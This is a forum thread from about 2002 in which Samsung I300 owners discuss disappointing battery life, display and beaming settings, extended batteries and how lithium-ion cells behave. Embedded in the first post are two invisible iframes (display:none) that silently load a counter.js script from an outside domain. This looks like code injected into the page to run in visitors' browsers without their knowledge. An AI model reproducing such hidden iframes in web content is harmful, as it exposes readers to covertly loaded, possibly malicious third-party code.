+ Reply to Thread

Thread: Battery Life

Angry Battery Life

Is anyone finding their "talk" time and stand by time to be MUCH LESS then advertised? I took the first phone back on Samsungs recomendation, and phone #2 isnt much better. It seems i an at 50% of battery after maybe 45 mintes of talk time.

So much for 4 hrs talk time and 100 hr of standby.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Robert, have you enabled "auto off of display during call" yet? That is the only thing I can imagine that would cause both of your phones to function so poorly. I presume you did fully charge both batteries before use as well. If you are talking on the phone for 45 minutes and the isplay is on the entire time then yes, that is normal. When in the phone app go to hit menu, options, then setup. Should get you straightened out.

Thanks for the response mjorange. Auto off is checked. first thing I set up being a formal Palm owner.
    Phone battery is already 50% spent for today. Made maybe 10 calls today. Is there a call timer feature like my Nokia 6160 had?

I oce had that Nokia as well. Unfortunately no. I know this will make absolutely no sense to you, as it doesn't to any of us. Still can't imagine why such poor battery stats.

I once made a call that was 124 minutes long (in a stationary position), starting with a full battery. There was one bar left on the battery gauge, so I guess it could have lasted a bit longer.

I have beam receive turned off, and the phone set for the Sprint network only. I also have auto off during call turned on.

I usually go two days on a charge. This includes a few short phone calls, and maybe 10 mins of Palm usage per day.

So, I cannot explain why your are getting the low battery life.

With one bar left, my I300 is minutes from being dead. I've had some issues with battery life also. I'm trying to see if it's now battery or phone related. I have beaming and auto off selected. I'm suspecting a bad battery or improper length of charging.

I'm sure someone here will tell me I am all wet, because there is NO "memory effect" with Lithium Ion batteries, but I always rotate the batteries and run them completely dead and ALWAYS charge them in the slot, NOT in the phone. I have found that the batteries don't change "as full" while they are in the phone. I guess the phone/pda is always draining the battery, even if it is just a little. With the standard batteries that come with the phone I was getting on average of about 1.5 days per battery. I consider myself an average to more than average user of both my cell and my pda.

Now that I have 2 Extended batteries, I still use the same procedure and am getting about 3 2.5 to 3 days of use on the batteries. So now I have 4 batteries (2 ex and 2 std) and have yet to take a trip where I had to take the travel charger out of the bag.

If battery life is an issue, spend the 70 bucks and get some extended batteries. They are worth it.
    Carl

Good response Carl. We all get so flustered by the small details of this gigantic tech world and many times don't stop to realize the simplicity of the solution. If battery stamina is that important buy the extended. We do with our cameras why not with our phones?
    Last edited by mjorange; 01-06-2002 at 04:32 PM.

So, Carl, would you say then that the extended battery is giving you about 75% more battery time?

I have noticed as many of you have that the stand by talk time of 100hrs is definitely suspect. However , I have two batteries and one is always in the charger so I do not have much of a issue with battery power. I have a Palm VII as well and can tell you that web applications and clippings take a great deal of power from your maching. One good way to improve on battery life issues is to watch how much you use the internet apps.

Originally posted by abward
    So, Carl, would you say then that the extended battery is giving you about 75% more battery time?
    Alan:
    I think 75% is a pretty fair assessment. I don't panic now leaving the house without the spare battery in my pocket.
    Carl

Administrator

Arrow

lithium batts have no memory, but they are not good in high current drain devices.. and this phone is a high current drain device.. you have the backlit screen, the power to/from the tower, and the speaker, and Ir beam (for example). the phone is pretty linear in terms of battery drain until it gets to 25% of battery life, then it dramatically goes downhill. those of you who have battery issues (i do not), its probably a good idea to follow carl and get the extended batts...

the fact that some get better times than others has a lot of factors in it.. geo. location, tower demand on the X-mission power from the phone, ambient/operarting temperature, and overall condition of the battery.. in time, the batteries will get worse, as they can only go thru soo many charges...

NiCad's were the workhorse in the industry, but they had terrible memory. and were very heavy. to get the same amount of time from a Nicad you get from our Li-Ion for example, that battery would be huge!
    Last edited by Marctronixx; 01-06-2002 at 07:38 PM.